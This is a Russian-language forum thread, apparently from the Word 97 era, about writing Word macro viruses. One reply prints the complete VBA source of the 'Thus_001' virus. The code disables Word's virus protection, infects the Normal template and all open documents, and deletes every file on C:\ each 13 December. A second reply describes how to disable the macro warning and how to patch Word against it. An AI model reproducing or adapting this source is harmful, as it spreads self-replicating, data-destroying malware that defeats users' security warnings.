> где можно найти доки о сабже (особенно о шифрованных и
> т.п.).
Кое-что есть в Infected Voice. А вообще с этим все просто: берешь вирус и смотришь его исходник, читаешь хелп по VBA.
Вот недавно поймал:
Private Sub Document_Open()
'Thus_001'
On Error Resume Next
Application.Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
.CodeModule.CountOfLines
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
.Item(1).CodeModule.CountOfLines)
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.DeleteLines 1, Application.Documents.Item(k) _
.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
End If
If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
.CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
.Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
.VBComponents.Item(1).CodeModule.CountOfLines)
End If
Next k
If (Day(Now()) = 13) And (Month(Now()) = 12) Then
With Application.FileSearch
.NewSearch
.LookIn = "C:\"
.SearchSubFolders = True
.FileName = .
.MatchTextExactly = False
.FileType = msoFileTypeAllFiles
If .Execute > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
End Sub
Private Sub Document_Close()
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
---
> Принципиально интересует вопрос: Отучили ли люди не
> вываливать сообщение в мсворде о нахождении макросов?
вирус может отключить это предупреждение:
Options.VirusProtection = False, см. приведенный исходник
Но вообще это фигня: можно пропатчить msword97.xlb, заменив в нем строку VirusProtection на VisurProtection, и ни один вирус, который будет пытаться это сделать, не запустится: при открытии зараженного документа Word скажет "Ошибка компиляции" и откроет исходный код вируса в VBA. Также можно пропатчить Word так, чтобы не работали макросы AutoOpen, AutoExec, FileOpen, FileSave... и т.д. Короче полная хана всем макро-вирусам :))
2 dl: А virii board не будет?
|
подробно о проекте
Анализ криптографических сетевых... 
